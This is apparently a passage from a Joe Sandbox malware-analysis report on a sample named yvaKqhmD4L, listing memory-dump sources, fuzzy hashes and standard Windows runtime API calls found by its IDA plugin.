                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 009345f38ae626d469f014b0d0cdef2e0b6b81041916f6b4890b19886bbdf896
                                              • Instruction ID: 5a63c393ef50530a603d3871cc88b8fd3bd9576b2cfc8d8b04e5bdd1f15fff68
                                              • Opcode Fuzzy Hash: 009345f38ae626d469f014b0d0cdef2e0b6b81041916f6b4890b19886bbdf896
                                              • Instruction Fuzzy Hash: 0851A9366166214BC70CDA3CD8515E73392EBC9370B18CB3EE59AC79D4EB79940BC601
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                              • Instruction ID: c4e1beece77859434670a2616be23b250703758956df4404b2882b49678f4689
                                              • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                              • Instruction Fuzzy Hash: CF518D76F0060E9BDB0CCE98D9916ADB7F6FB88308F248169D916E7781D7749A41CB80
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9302b36b025ec877457fbbf1a21bafb2f45ab16812df500e0537ae03573401d4
                                              • Instruction ID: 13e50226afad38640bfc6fc3e77c29c21a27d65ea1f2d31397fd8907577e50ef
                                              • Opcode Fuzzy Hash: 9302b36b025ec877457fbbf1a21bafb2f45ab16812df500e0537ae03573401d4
                                              • Instruction Fuzzy Hash: F151573610C7068FC314DF6CE8409EA73A1AFC5324F618B3EE495CB8D1EB75512A8B46
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                              • Instruction ID: 6a5c486461f210fe5b1d3f6e4a322bfad553d7a1874673e2ad059b885851857d
                                              • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                              • Instruction Fuzzy Hash: 303114277A440603C70CCD3BCC12B9FA1575BD422A75ECF39AD49CEF55D52CC8164145
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45b2161698018eadccb4f7bd58f5b3057a7418cbe45630c8bf609166058c8f45
                                              • Instruction ID: 2c550a51a785dac8c831483f792981ec3faa4998a7a2d969da78965db954af9a
                                              • Opcode Fuzzy Hash: 45b2161698018eadccb4f7bd58f5b3057a7418cbe45630c8bf609166058c8f45
                                              • Instruction Fuzzy Hash: EC418B72A487168FC304DE58EC804EBB3E6EFC8320F904B2D9865872D5D771691AC790
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 098c659f76e41217d8669f6238bf7423f4d33ff929d6c702424d2a71048e67eb
                                              • Instruction ID: f3807bc4e3f2170f84ac857d607bf957f6f02f65255b76147a4c0a5546878e19
                                              • Opcode Fuzzy Hash: 098c659f76e41217d8669f6238bf7423f4d33ff929d6c702424d2a71048e67eb
                                              • Instruction Fuzzy Hash: 32318831A147128BD728DA79D4500ABB3E7EFC5318B55CB3DC4568B989EB76600BCB82
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                              • Instruction ID: f9adc4f6c83925f0b96586890ebce18096440bcf399818120dfadb6cd395fc66
                                              • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                              • Instruction Fuzzy Hash: E7219077320A0647E74C8A38D83737532D0A705318F98A22DEA6BCE2C2D73AC457C385
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 924d2f8ea592117d96ebb75533a8c610edd608467bf2262fe8ba800d0f3cf9be
                                              • Instruction ID: ab0889b3e87081b2013f836b6ed3c3d576d412785263ee4f1e544b57d564b724
                                              • Opcode Fuzzy Hash: 924d2f8ea592117d96ebb75533a8c610edd608467bf2262fe8ba800d0f3cf9be
                                              • Instruction Fuzzy Hash: 84F03031B5522CDBCB12CA49D445B89B7B8EB45BA9F114197F9419BA40C6B0ED40C7D0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                              • Instruction ID: c15b832000735525b230172a7684fb2d9a1c59dcfaa68fabd8549285515103f3
                                              • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                              • Instruction Fuzzy Hash: 8BE04632A12228EBCB10CB888904A8AB3ACEB45B04B1100A6B905D3600C2B0EE00C7D0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                              • Instruction ID: b32dbd86ef5ebff34dadf6067629e5cad3e8b0861abbfda256038d014444f525
                                              • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                              • Instruction Fuzzy Hash: FEC08CA722910057C302EA2599C0BAEF6B37360330F228D2EA0A2E7E43C328C0788112
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                              • API String ID: 3519838083-609671
                                              • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                              • Instruction ID: 931f3621e052f2bf2182da360d621de1572f6fdc7347cfcb5fe2b14ba7c6c34c
                                              • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                              • Instruction Fuzzy Hash: 36D17B71A0420E9FDB01CFA5D980AEEB7B5FF05309F244529E855A3A60DB74E989CB70
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __aulldiv$H_prolog
                                              • String ID: >WJ$x$x
                                              • API String ID: 2300968129-3162267903
                                              • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                              • Instruction ID: ce02eef34edec1676757e4502149a5b5b446fee5bcf35c58b674edd6efce9df4
                                              • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                              • Instruction Fuzzy Hash: AE128C7190021EDFDF18EFA8C980ADDBBB9FF08318F248169E919AB650CB359954CF50
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 6C1FD1F7
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6C1FD1FF
                                              • _ValidateLocalCookies.LIBCMT ref: 6C1FD288
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6C1FD2B3
                                              • _ValidateLocalCookies.LIBCMT ref: 6C1FD308
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: f9441859256a9fe1a8d02d890418d14854e0b446076d5462e8f06472b5a63e1c
                                              • Instruction ID: da500459c1b5b9b359026c5494b6a62f62324502ca818492aa106a4945ab0462
                                              • Opcode Fuzzy Hash: f9441859256a9fe1a8d02d890418d14854e0b446076d5462e8f06472b5a63e1c
                                              • Instruction Fuzzy Hash: 47419334A0121DABCF00EF68C884AAE7BF5AF45318F148155ED349BB91DB31DA06CBD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: api-ms-$ext-ms-
                                              • API String ID: 0-537541572
                                              • Opcode ID: 7fcc79ab3d9fea6f889cc27ccc6df15dae85a213cd67399ef0ac69890308cf6b
                                              • Instruction ID: fbd9911932b3e33392177fbff70269557ebabb0d8b2585e59f1269bbb4768fdd
                                              • Opcode Fuzzy Hash: 7fcc79ab3d9fea6f889cc27ccc6df15dae85a213cd67399ef0ac69890308cf6b
                                              • Instruction Fuzzy Hash: 1621BB72F0921EEBDF118A79CC88E4A37B4AB127B9F550612FD15A76C0DA34DC01C6E4
                                              APIs
                                              • GetConsoleCP.KERNEL32(?,6C20E7C0,?), ref: 6C20F5E9
                                              • __fassign.LIBCMT ref: 6C20F7C8
                                              • __fassign.LIBCMT ref: 6C20F7E5
                                              • WriteFile.KERNEL32(?,6C2191A6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C20F82D
                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C20F86D
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C20F919
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: FileWrite__fassign$ConsoleErrorLast
                                              • String ID:
                                              • API String ID: 4031098158-0
                                              • Opcode ID: c57935d91a100bf5a5225ff7d828c06b8ff8f8d7955fe62731d00a9ce7b15518
                                              • Instruction ID: ee7748c8769e15e628876ba596821d6ccb41ff81c7b881024d158266e96013a6
                                              • Opcode Fuzzy Hash: c57935d91a100bf5a5225ff7d828c06b8ff8f8d7955fe62731d00a9ce7b15518
                                              • Instruction Fuzzy Hash: B2D1AA75E0124D9FCF11CFA8C8809EEBBB5BF49314F28016AE865BB251D731AA46CB54
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C0C2F95
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C0C2FAF
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C2FD0
                                              • __Getctype.LIBCPMT ref: 6C0C3084
                                              • std::_Facet_Register.LIBCPMT ref: 6C0C309C
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C30B7
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                              • String ID:
                                              • API String ID: 1102183713-0
                                              • Opcode ID: 80ebe4a101f410483f2ffd749594e987ba813d15bf76e95a7edce1c9add9d53a
                                              • Instruction ID: 9354233649826effa485a0887e8b2b0d01d4a9fbe66184c5a81a434bef22208a
                                              • Opcode Fuzzy Hash: 80ebe4a101f410483f2ffd749594e987ba813d15bf76e95a7edce1c9add9d53a
                                              • Instruction Fuzzy Hash: 244137B2E006188FDB10CF98D864BDEB7F4FF48728F144129D869ABB90D775A905CB91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __aulldiv$__aullrem
                                              • String ID:
                                              • API String ID: 2022606265-0
                                              • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                              • Instruction ID: e46454db3db42c66fc3e9b7ce7350dedfd050f1d64d3b6dce849d928ed574ffd
                                              • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                              • Instruction Fuzzy Hash: 3921C3B064126EFEDF108E94CC40DDF7B6DEB417A9F208227BD28A5690DA718D50D662
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C23D6F1
                                                • Part of subcall function 6C24C173: __EH_prolog.LIBCMT ref: 6C24C178
                                              • __EH_prolog.LIBCMT ref: 6C23D8F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: IJ$WIJ$J
                                              • API String ID: 3519838083-740443243
                                              • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                              • Instruction ID: e434575ba6d7fbf68d4cd06f4090d8c5f5d160a59367cc010fee2eef8031f770
                                              • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                              • Instruction Fuzzy Hash: C071AE70910269DFDB14DFA4C484BEDB7B4BF14308F1085A9EC596BB91CB78BA09CB91
                                              APIs
                                              • _free.LIBCMT ref: 6C2191CD
                                              • _free.LIBCMT ref: 6C2191F6
                                              • SetEndOfFile.KERNEL32(00000000,6C217DDC,00000000,6C20E7C0,?,?,?,?,?,?,?,6C217DDC,6C20E7C0,00000000), ref: 6C219228
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C217DDC,6C20E7C0,00000000,?,?,?,?,00000000,?), ref: 6C219244
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFileLast
                                              • String ID: 8Q
                                              • API String ID: 1547350101-4022487301
                                              • Opcode ID: fc7295cd3bd06f04f58469fe149cf774bded88a62fbdd4edf5a51d1b794aca83
                                              • Instruction ID: da65b913903cad4d0702c3ba5e3f7aa4600a6f66fcadce606e9ec69817e6c375
                                              • Opcode Fuzzy Hash: fc7295cd3bd06f04f58469fe149cf774bded88a62fbdd4edf5a51d1b794aca83
                                              • Instruction Fuzzy Hash: F641B832A0960D9ADB01ABACCC44BCD37F6AF45334F140515FE24A7F90EB31D8A94751
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C25141D
                                                • Part of subcall function 6C251E40: __EH_prolog.LIBCMT ref: 6C251E45
                                                • Part of subcall function 6C2518EB: __EH_prolog.LIBCMT ref: 6C2518F0
                                                • Part of subcall function 6C251593: __EH_prolog.LIBCMT ref: 6C251598
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: &qB$0aJ$A0$XqB
                                              • API String ID: 3519838083-1326096578
                                              • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                              • Instruction ID: 698e4824ae6cc9fa0df85d253cd64c4b7701bd280e60e46bb2014124f2bd6027
                                              • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                              • Instruction Fuzzy Hash: E921BB70D0125CAACF04DFE4D9819EDBBB4AF25308F600129D81223781DB784E4CCB61
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: J$0J$DJ$`J
                                              • API String ID: 3519838083-2453737217
                                              • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                              • Instruction ID: 7a7741f45864b4d8fc4e7495ce5923d68726aed1473514961290b45a7223314c
                                              • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                              • Instruction Fuzzy Hash: AF11C2B0900B68CEC724DF5AC45419AFBE4BFA5708B10CA1FC4A687B50C7F8A549CB99
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C2028A4,?,?,6C202925,?,?,?), ref: 6C20282F
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C202842
                                              • FreeLibrary.KERNEL32(00000000,?,?,6C2028A4,?,?,6C202925,?,?,?), ref: 6C202865
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
